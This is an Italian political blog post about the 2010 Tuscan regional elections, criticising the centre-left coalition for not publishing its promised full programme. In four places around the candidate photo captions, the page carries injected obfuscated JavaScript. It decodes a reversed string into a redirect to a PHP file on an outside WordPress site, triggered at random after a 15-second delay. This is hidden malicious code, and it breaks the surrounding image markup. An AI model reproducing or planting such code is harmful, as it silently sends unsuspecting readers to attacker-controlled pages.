Regionali in Toscana. Il centrosinistra e il mistero del programma che non c'è.

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/03/enricorossi.jpg”>Enrico Rossi - PD
Enrico Rossi - Partito Democratico

Abbiamo già scritto cosa pensiamo di alcune promesse elettorali di Enrico Rossi e della coalizione che lo sostiene, rigassificatori e comunque adottare una politica sviluppista che mette in secondo piano, a nostro avviso, i diritti della persona e la tutela dell’ambiente e del territorio. (Alcuni approfondimenti agli indirizzi http://bit.ly/aNnCda, http://bit.ly/bnjcBv, http://bit.ly/9uoHS1, http://bit.ly/92fgDN)

Quando è uscito l’accordo programmatico di coalizione che mette insieme Partito Democratico, Italia dei Valori, Federazione della Sinistra e Sinistra Ecologia e Libertà (lo trovate qui) ci siamo trovati davanti all’ovvio compromesso – in un paese come ormai è ridotto il nostro – che permetta al PD di affermare che i CIE saranno una delle priorità del nuovo governo regionale e allo stesso tempo all’ala sinistra/comunista di ribadire che nessun CIE verrà mai istituito in Toscana. Questo è solo un esempio, ma ce ne sono tanti altri interessanti.

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/03/petraglia.jpg”>Alessia Petraglia - Sinistra Ecologia e Libertà
Alessia Petraglia - Sinistra Ecologia e Libertà
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/03/sgherri.jpg”>Monica Sgherri - Federazione della Sinistra
Monica Sgherri - Federazione della Sinistra
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/03/romanelli.jpg”>Mauro Romanelli - Federazione della Sinistra
Mauro Romanelli - Federazione della Sinistra

All’interno dell’accordo, intitolato “La Toscana avanti tutta” e datato 16 febbraio, si rimanda al programma vero e proprio per i leggittimi approfondimenti a cui aspirasse un potenziale elettore. A pagina 12 infatti troviamo questa frase: “Questi elementi saranno affrontati nell’ambito di un documento di indirizzo programmatico la cui prima stesura è già stata anticipata ai partiti di centro-sinistra della coalizione.

Oggi, a più di un mese da quella promessa e a cinque giorni dalle elezioni, sui siti dei partiti della coalizione l’unico riferimento rimane quello, general-generico, al documento del 16 febbraio. Del programma vero e proprio nessuna traccia.

Ci domandiamo perché. E lo domandiamo anche ai partiti della coalizione.

Sempre che abbiano intenzione di dire all’elettorato perché chiedono il voto, nero su bianco.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *